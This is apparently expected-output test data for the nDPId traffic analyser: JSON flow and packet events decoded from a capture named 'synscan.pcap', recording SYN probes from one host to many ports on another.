-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstrAAADgGWcKsEAAIQA2GNIzSBK\/dUoMYAAAAAGACBAAv4AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+94AACwGIJSsEAAIQA2GNIzSBrndUoMYAAAAAGACBAAt1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAskckAADoGfKmsEAAIQA2GNIzSKhrdUoMYAAAAAGACDAACdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsvA8AAC4GXmOsEAAIQA2GNIzSBrbdUoMYAAAAAGACDAAl2QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADQGcP2sEAAIQA2GNIzSPoDdUoMYAAAAAGACBAD2DgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjYAADgGmjysEAAIQA2GNIzSAH3dUoMYAAAAAGACBAA0EgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstNUAACgGa52sEAAIQA2GNIzSBnrdUoMYAAAAAGACBAAuFQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs8U8AACUGMiOsEAAIQA2GNIzSBHzdUoMYAAAAAGACCAAsEwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZEAACkGseGsEAAIQA2GNIzSAW7dUoMYAAAAAGACCAAvIQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAszmgAADIGSAqsEAAIQA2GNIzSwA3dUoMYAAAAAGACDABsgQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpgAADcGStqsEAAIQA2GNIzSBy\/dUoMYAAAAAGACEAAhYAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxQAADkGxF6sEAAIQA2GNIzSJtfdUoMYAAAAAGACCAAJuAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADoGVqqsEAAIQA2GNIzSCDvdUoMYAAAAAGACDAAkVAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsZw4AADEGsGSsEAAIQA2GNIzSKXndUoMYAAAAAGACCAAHFgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs2AwAACgGSGasEAAIQA2GNIzSCp3dUoMYAAAAAGACBAAp8gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsRBEAAC0G12GsEAAIQA2GNIzSJxPdUoMYAAAAAGACCAAJfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs8C8AADUGI0OsEAAIQA2GNIzSBBHdUoMYAAAAAGACCAAsfgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsHTEAACwG\/0GsEAAIQA2GNIzSBBLdUoMYAAAAAGACBAAwfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsK1MAADIG6x+sEAAIQA2GNIzSH5LdUoMYAAAAAGACDAAM\/QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsd90AADEGn5WsEAAIQA2GNIzSBI3dUoMYAAAAAGACCAAsAgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KcAACcGQMusEAAIQA2GNIzSFR3dUoMYAAAAAGACEAATcgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs36oAADkGL8isEAAIQA2GNIzSE7vdUoMYAAAAAGACCAAc1AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs554AADQGLNSsEAAIQA2GNIzSCU\/dUoMYAAAAAGACBAArQAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVqIAAC8GwtCsEAAIQA2GNIzSB+bdUoMYAAAAAGACEAAgqQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJQAADMGwN6sEAAIQA2GNIzSGW7dUoMYAAAAAGACEAAPIQAAAgQFtA=="} 